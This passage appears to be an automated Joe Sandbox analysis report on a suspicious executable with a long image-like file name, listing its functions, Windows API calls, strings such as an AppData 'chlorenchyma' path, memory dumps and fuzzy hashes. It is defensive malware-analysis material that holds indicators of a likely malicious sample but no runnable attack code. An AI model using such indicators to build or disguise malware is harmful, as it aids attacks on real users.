                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                        • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C

                                        Non-executed Functions

                                        Function 004047BF Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 274stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        • A, xrefs: 004048E2
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 0040490F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 2624150263-2737355476
                                        • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        Function 6E331B28 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6E3312A5: GlobalAlloc.KERNEL32(00000040,6E3312C3,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312AD
                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6E331C54
                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6E331C9C
                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6E331CA6
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331CB9
                                        • GlobalFree.KERNEL32(?), ref: 6E331D99
                                        • GlobalFree.KERNEL32(?), ref: 6E331D9E
                                        • GlobalFree.KERNEL32(?), ref: 6E331DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331F8A
                                        • lstrcpyA.KERNEL32(?,?), ref: 6E332128
                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6E3321A4
                                        • LoadLibraryA.KERNEL32(00000008), ref: 6E3321B5
                                        • GetProcAddress.KERNEL32(?,?), ref: 6E33220E
                                        • lstrlenA.KERNEL32(00000408), ref: 6E332228
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 3fda07ff75f31c8923bed2b00ce74a214418530e2bd8fa761dac4d46121aa3d4
                                        • Instruction ID: 430543c75eff79c1c0d2a2541163112a8d78352068d7d8b859768e0a71191e7a
                                        • Opcode Fuzzy Hash: 3fda07ff75f31c8923bed2b00ce74a214418530e2bd8fa761dac4d46121aa3d4
                                        • Instruction Fuzzy Hash: E622C071D146AADEDB908FE8C990BEDBBF8BB06305F30856ED1A1E3180C7755549CB90
                                        Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 0040225D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 123533781-1124611765
                                        • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                        • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                        Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                        • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                        • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                        • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                        Function 00406AFA Relevance: .3, Instructions: 334COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                        • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                        Function 004072D1 Relevance: .3, Instructions: 300COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                        • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                        Function 00404D32 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        Function 00404498 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$cD@
                                        • API String ID: 3103080414-2800326580
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
